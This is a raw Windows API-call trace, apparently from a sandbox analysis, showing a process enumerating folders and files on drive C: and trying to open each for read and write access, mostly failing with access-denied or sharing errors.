ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77892bc0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0084.669] AreFileApisANSI () returned 1 [0084.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Documents and Settings", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Documents and Settings", lpUsedDefaultChar=0x0) returned 26 [0084.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.670] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.670] AreFileApisANSI () returned 1 [0084.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0084.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x34) returned 0x78e50 [0084.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78e50, cchWideChar=26 | out: lpWideCharStr="C:\\Documents and Settings") returned 26 [0084.670] CreateFileW (lpFileName="C:\\Documents and Settings" (normalized: "c:\\documents and settings"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.670] GetLastError () returned 0x5 [0084.670] GetLastError () returned 0x5 [0084.670] SetLastError (dwErrCode=0x5) [0084.670] GetLastError () returned 0x5 [0084.670] SetLastError (dwErrCode=0x5) [0084.670] GetLastError () returned 0x5 [0084.670] SetLastError (dwErrCode=0x5) [0084.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78e50 | out: hHeap=0x20000) returned 1 [0084.670] AreFileApisANSI () returned 1 [0084.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0084.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x34) returned 0x78c50 [0084.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78c50, cchWideChar=26 | out: lpWideCharStr="C:\\Documents and Settings") returned 26 [0084.670] CreateFileW (lpFileName="C:\\Documents and Settings" (normalized: "c:\\documents and settings"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.671] GetLastError () returned 0x5 [0084.671] GetLastError () returned 0x5 [0084.671] SetLastError (dwErrCode=0x5) [0084.671] GetLastError () returned 0x5 [0084.671] SetLastError (dwErrCode=0x5) [0084.671] GetLastError () returned 0x5 [0084.671] SetLastError (dwErrCode=0x5) [0084.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78c50 | out: hHeap=0x20000) returned 1 [0084.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0084.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0084.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.671] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ESD", cAlternateFileName="")) returned 1 [0084.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.671] FindFirstFileExW (in: lpFileName="C:\\Documents and Settings\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0xffffffff [0084.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0084.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0084.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0084.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0084.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0084.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0084.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0084.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0084.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.672] AreFileApisANSI () returned 1 [0084.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ESD", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ESD", lpUsedDefaultChar=0x0) returned 7 [0084.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.672] AreFileApisANSI () returned 1 [0084.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0084.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d588 [0084.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x7d588, cchWideChar=7 | out: lpWideCharStr="C:\\ESD") returned 7 [0084.673] CreateFileW (lpFileName="C:\\ESD" (normalized: "c:\\esd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.673] GetLastError () returned 0x5 [0084.673] GetLastError () returned 0x5 [0084.673] SetLastError (dwErrCode=0x5) [0084.673] GetLastError () returned 0x5 [0084.673] SetLastError (dwErrCode=0x5) [0084.673] GetLastError () returned 0x5 [0084.673] SetLastError (dwErrCode=0x5) [0084.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0084.673] AreFileApisANSI () returned 1 [0084.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0084.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d690 [0084.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x7d690, cchWideChar=7 | out: lpWideCharStr="C:\\ESD") returned 7 [0084.673] CreateFileW (lpFileName="C:\\ESD" (normalized: "c:\\esd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.673] GetLastError () returned 0x5 [0084.673] GetLastError () returned 0x5 [0084.673] SetLastError (dwErrCode=0x5) [0084.673] GetLastError () returned 0x5 [0084.673] SetLastError (dwErrCode=0x5) [0084.673] GetLastError () returned 0x5 [0084.673] SetLastError (dwErrCode=0x5) [0084.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0084.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.674] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x174ff10, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0084.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0084.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.674] FindFirstFileExW (in: lpFileName="C:\\ESD\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78c50 [0084.675] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.675] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0084.675] FindClose (in: hFindFile=0x78c50 | out: hFindFile=0x78c50) returned 1 [0084.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0084.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0084.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0084.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0084.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.676] AreFileApisANSI () returned 1 [0084.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\hiberfil.sys", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\hiberfil.sys", lpUsedDefaultChar=0x0) returned 16 [0084.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.676] AreFileApisANSI () returned 1 [0084.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0084.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=16 | out: lpWideCharStr="C:\\hiberfil.sys") returned 16 [0084.676] CreateFileW (lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.676] GetLastError () returned 0x20 [0084.676] GetLastError () returned 0x20 [0084.676] SetLastError (dwErrCode=0x20) [0084.676] GetLastError () returned 0x20 [0084.676] SetLastError (dwErrCode=0x20) [0084.676] GetLastError () returned 0x20 [0084.677] SetLastError (dwErrCode=0x20) [0084.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.677] AreFileApisANSI () returned 1 [0084.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0084.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=16 | out: lpWideCharStr="C:\\hiberfil.sys") returned 16 [0084.677] CreateFileW (lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.677] GetLastError () returned 0x20 [0084.677] GetLastError () returned 0x20 [0084.677] SetLastError (dwErrCode=0x20) [0084.677] GetLastError () returned 0x20 [0084.677] SetLastError (dwErrCode=0x20) [0084.677] GetLastError () returned 0x20 [0084.677] SetLastError (dwErrCode=0x20) [0084.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.677] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Logs", cAlternateFileName="")) returned 1 [0084.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 